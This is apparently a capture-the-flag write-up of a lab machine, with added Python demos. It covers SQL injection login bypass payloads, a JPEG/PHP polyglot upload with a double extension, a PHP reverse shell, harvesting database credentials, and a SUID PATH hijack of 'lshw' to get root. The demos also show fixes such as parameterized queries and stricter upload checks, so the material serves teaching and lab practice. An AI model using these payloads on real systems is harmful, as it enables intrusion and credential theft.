

Run an Nmap scan against the target IP.

Go to the website. We can see we need to log in before we can upload an image.

Go to the login page and try SQL injection in the login form.

That was successful, and now we can access the page without a valid login.
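The write-up does not show the payload it used, so as an added example (not from the original post) here is the auth-bypass idea reproduced against an in-memory SQLite table: the login query is built by string concatenation, so a quote in the password or username rewrites the WHERE clause. The table, the credentials and the two payloads are constructed for this demo; the parameterized `login_safe` shows the fix.

```python
import sqlite3

# Constructed user table for the demo; the credentials are made up.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'S3cretPassw0rd')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The injectable pattern: user input is pasted straight into the SQL text.
    query = ("SELECT username FROM login WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the quote characters stay data and never reach the parser.
    query = "SELECT username FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Two classic (assumed) payloads:
#   OR_PAYLOAD makes the WHERE clause  ... AND password = '' OR '1'='1'
#   COMMENT_PAYLOAD turns it into       ... username = 'admin'-- ' AND password = ...
OR_PAYLOAD = "' OR '1'='1"
COMMENT_PAYLOAD = "admin'-- "


def demo() -> dict:
    conn = make_db()
    return {
        "vuln_wrong_password": login_vulnerable(conn, "admin", "wrong"),
        "vuln_or_payload": login_vulnerable(conn, "nobody", OR_PAYLOAD),
        "vuln_comment_payload": login_vulnerable(conn, COMMENT_PAYLOAD, "anything"),
        "safe_or_payload": login_safe(conn, "nobody", OR_PAYLOAD),
        "safe_real_creds": login_safe(conn, "admin", "S3cretPassw0rd"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

`login_vulnerable` lets both payloads in without the password; `login_safe` only accepts the real credentials.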
Now let's try the image upload. We are not actually uploading an image:
we are uploading a PHP script to check whether the upload is vulnerable.

To get the PHP script past the upload check we need to give it the magic numbers (file signature bytes) of an image. Google for "magic numbers" / file signatures.

Scroll down to jpg/jpeg and we can see the hex values (FF D8 FF ...).

Now open the file in ghex and put the JPEG magic numbers at the very start of it.

Now upload it through Burp Suite, changing the filename in the intercepted request from a.jpg to a.php.jpg.


We can see the file uploaded successfully.
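The ghex plus Burp steps above, scripted. This is an added example and not code from the original post: it builds the JPEG/PHP polyglot (signature bytes first, PHP after), shows why a validator that only checks the extension suffix and the magic bytes accepts `a.php.jpg`, and contrasts it with a stricter check. The validator functions are assumptions about what the site does; the PHP probe body is constructed.

```python
from pathlib import Path

JPEG_MAGIC = b"\xff\xd8\xff\xe0"  # FF D8 FF E0: JPEG/JFIF signature
# Minimal APP0 (JFIF) segment so the header is a plausible image start.
JFIF_APP0 = b"\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"

# Constructed probe; the write-up only says the script revealed the PHP version.
PHP_PROBE = b"<?php phpinfo(); ?>"


def make_polyglot(php: bytes) -> bytes:
    """Prepend the JPEG signature. PHP emits the leading bytes as-is and
    executes the <?php ... ?> block, so the file is both 'an image' and code."""
    return JPEG_MAGIC + JFIF_APP0 + php


def has_jpeg_magic(data: bytes) -> bool:
    return data[:3] == b"\xff\xd8\xff"


def naive_upload_check(filename: str, data: bytes) -> bool:
    """Assumed weak validator: suffix is .jpg/.jpeg and signature matches.
    'a.php.jpg' passes both tests."""
    return filename.lower().endswith((".jpg", ".jpeg")) and has_jpeg_magic(data)


def strict_upload_check(filename: str, data: bytes) -> bool:
    """Hardened version: exactly one allow-listed extension and no PHP open tag.
    The real fix is to store the file under a server-generated name outside the
    web root, but this already rejects the double-extension trick."""
    parts = Path(filename).name.split(".")
    if len(parts) != 2 or parts[1].lower() not in ("jpg", "jpeg"):
        return False
    return has_jpeg_magic(data) and b"<?" not in data


def write_polyglot(path: str = "a.php.jpg") -> int:
    data = make_polyglot(PHP_PROBE)
    Path(path).write_bytes(data)
    return len(data)


if __name__ == "__main__":
    print("bytes written:", write_polyglot())
    print("naive check accepts a.php.jpg:",
          naive_upload_check("a.php.jpg", make_polyglot(PHP_PROBE)))
    print("strict check accepts a.php.jpg:",
          strict_upload_check("a.php.jpg", make_polyglot(PHP_PROBE)))
```

The double extension only pays off when the server maps the `.php` part to the PHP handler even though it is not the last extension (Apache's mod_mime evaluates every dot-separated part), which is why the next step is to browse to the uploaded file and confirm it really executes.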

Now we need to find out where the file was uploaded. Run dirsearch to enumerate directories.

We can see that inside the "img" directory there is an "uploads" folder.

Go to 'img/uploads' and request "a.php.jpg", the file we uploaded.
We can see the PHP version, so the file is being executed as PHP and we can upload a PHP reverse shell here as well.

I uploaded the reverse shell the same way and got a shell back.

cat /etc/passwd shows that there is a "theseus" user.

Going through the db.php5 file in the Magic folder under '/var/www', we can see the MySQL database credentials.

Using those credentials, dump the MySQL database to a file.

Open the file and we can see the stored credentials.

Log in as theseus with the password we just found, and we have a theseus shell.

Now, looking through the SUID binaries, I found an interesting file in /bin: sysinfo.

Check what sysinfo does.

We can see it runs hardware-information commands, so let's check which hardware-report commands exist on Linux. We find a few.

Now let's create our own 'lshw' containing a custom command and put its directory at the front of PATH.
Then run sysinfo and we get a root shell, because sysinfo calls 'lshw' by its bare name (no absolute path), so it picks up ours from PATH and runs it with root privileges.

We got a shell, but it is not interactive, so put a bash reverse-shell one-liner in the fake lshw and run sysinfo again to get a reverse shell. And finally we get root.txt.
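The PATH hijack above, reproduced as an added example (not code from the original post). The real sysinfo binary is not reproduced here; `run_like_sysinfo` is a stand-in that does the one thing that matters, invoking `lshw -short` by bare name through the shell. `plant_fake_lshw` drops a script named lshw into a directory that is then placed first on PATH, and the payload it prints is a harmless marker instead of the reverse shell used in the write-up.

```python
import os
import stat
import subprocess
import tempfile

# Stand-in for the SUID sysinfo binary: the command name is unqualified, so
# whatever "lshw" is found first on PATH gets executed.
def run_like_sysinfo(path_env: str) -> str:
    env = dict(os.environ, PATH=path_env)
    result = subprocess.run("lshw -short", shell=True, env=env,
                            capture_output=True, text=True)
    return result.stdout


def plant_fake_lshw(directory: str, payload: str) -> str:
    """Write an executable shell script called lshw into `directory`.
    In the write-up the payload was a bash reverse-shell one-liner; here it is
    just whatever command string the caller passes."""
    path = os.path.join(directory, "lshw")
    with open(path, "w") as f:
        f.write("#!/bin/sh\n" + payload + "\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def hijack_demo(payload: str = "echo HIJACKED uid=$(id -u)") -> str:
    """Plant the fake lshw, prepend its directory to PATH and run the stand-in.
    The returned output comes from our script, not the real lshw."""
    with tempfile.TemporaryDirectory() as d:
        plant_fake_lshw(d, payload)
        hijacked_path = d + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        return run_like_sysinfo(hijacked_path)


if __name__ == "__main__":
    print("with hijacked PATH:", hijack_demo().strip())
    print("with clean PATH:", run_like_sysinfo("/usr/bin:/bin").strip() or "(no lshw / no output)")
```

Two caveats worth checking before relying on this on a real target: the binary must really call the helper by bare name (an absolute path like /usr/bin/lshw is not hijackable this way), and if the payload just spawns bash the shell drops the effective root UID unless it is started with `bash -p`, which is one reason a reverse shell from the fake lshw is the simpler route.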